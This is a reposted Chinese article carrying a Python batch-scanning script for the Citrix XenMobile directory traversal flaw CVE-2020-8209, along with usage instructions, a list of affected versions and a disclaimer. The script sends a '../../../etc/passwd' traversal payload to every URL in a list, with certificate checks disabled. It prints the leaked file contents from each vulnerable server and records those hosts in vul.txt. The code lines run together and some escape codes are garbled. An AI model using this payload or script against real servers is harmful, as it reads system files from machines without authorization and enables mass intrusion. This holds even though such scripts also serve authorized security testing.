使用方法&免责声明
该脚本为Citrix XenMobile目录遍历扩展(CVE-2020-8209)批量检测脚本。
使用方法:Python CVE-2020-8209-Multiple.py url.txt
存在漏洞的地址输出在vul.txt中
影响版本:
-
RP2之前的Citrix XenMobile服务器10.12
-
RP4之前的Citrix XenMobile服务器10.11
-
RP6之前的Citrix XenMobile服务器10.10
-
RP5之前的Citrix XenMobile服务器10.9
工具仅用于安全人员安全测试,任何未授权检测造成的直接或间接的后果及损失,均由使用者本人负责
#!/usr/bin/env python# coding:utf-8# author:B1anda0import requests,sys,coloramafrom colorama import *init(autoreset=True)banner='''�33[1;33;40m_______ ________ ___ ___ ___ ___ ___ ___ ___ ___/ ____ / / ____| |__ / _ __ / _ / _ __ / _ / _| | / /| |__ ______ ) | | | | ) | | | |_____| (_) | ) | | | | (_) || | / / | __|______/ /| | | |/ /| | | |______> _ < / /| | | |__, || |____ / | |____ / /_| |_| / /_| |_| | | (_) / /_| |_| | / /_____| / |______| |____|___/____|___/ ___/____|___/ /_/'''def XenMobile():headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}payload= '/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd'poc=urls+payloadtry:requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告response=requests.get(poc,headers=headers,timeout=10,verify=False)if response.status_code==200 and "root" in response.content:print(u'�33[1;31;40m[+]{} is citrix xenmobile directory traversal vulnerability'.format(urls))print(response.content)#将漏洞地址输出在Vul.txt中f=open('./vul.txt','a')f.write(urls)f.write('n')else:print('�33[1;32;40m[-]{} None'.format(urls))except:print('{} request timeout'.format(urls))if __name__ == '__main__':print (banner)if len(sys.argv)!=2:print('Example:python CVE-2020-8209.py url.txt')else:file = open(sys.argv[1])for url in file.readlines():urls=url.strip()if urls[-1]=='/':urls=urls[:-1]XenMobile()print ('Check Over')
项目地址:https://github.com/B1anda0/CVE-2020-8209/blob/main/CVE-2020-8209-Multiple.py
本文始发于微信公众号(Ots安全):Citrix XenMobile目录遍历扩展(CVE-2020-8209)批量检测脚本
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论